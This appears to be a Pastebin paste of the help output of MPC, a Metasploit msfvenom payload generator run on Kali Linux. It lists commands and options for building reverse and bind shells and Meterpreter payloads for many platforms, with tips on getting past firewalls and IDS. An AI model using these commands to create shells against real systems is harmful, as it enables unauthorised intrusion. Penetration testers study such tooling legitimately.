Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:~# mpc
- [*] Msfvenom Payload Creator (MPC v1.3.2)
- [i] Missing type
- [i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
- [i] Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP.
- [i] /usr/bin/mpc elf bind eth0 4444 # Linux, eth0's IP & manual port.
- [i] /usr/bin/mpc stageless cmd py https # Python, stageless command prompt.
- [i] /usr/bin/mpc verbose loop eth1 # A payload for every type, using eth1's IP.
- [i] /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
- [i] /usr/bin/mpc help verbose # Help screen, with even more information.
- [i] <TYPE>:
- [i] + ASP
- [i] + ASPX
- [i] + Bash [.sh]
- [i] + Java [.jsp]
- [i] + Linux [.elf]
- [i] + OSX [.macho]
- [i] + Perl [.pl]
- [i] + PHP
- [i] + Powershell [.ps1]
- [i] + Python [.py]
- [i] + Tomcat [.war]
- [i] + Windows [.exe]
- [i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
- [i] Missing <DOMAIN/IP> will default to the IP menu.
- [i] Missing <PORT> will default to 443.
- [i] <CMD> is a standard/native command prompt/terminal to interactive with.
- [i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
- [i] Missing <CMD/MSF> will default to <MSF> where possible.
- [i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
- [i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
- [i] Missing <BIND/REVERSE> will default to <REVERSE>.
- [i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
- [i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
- [i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
- [i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
- [i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
- [i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
- [i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
- [i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
- [i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
- [i] <LOOP> will just create one of each <TYPE>.
- [i] <VERBOSE> will display more information.
- root@kali:~#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement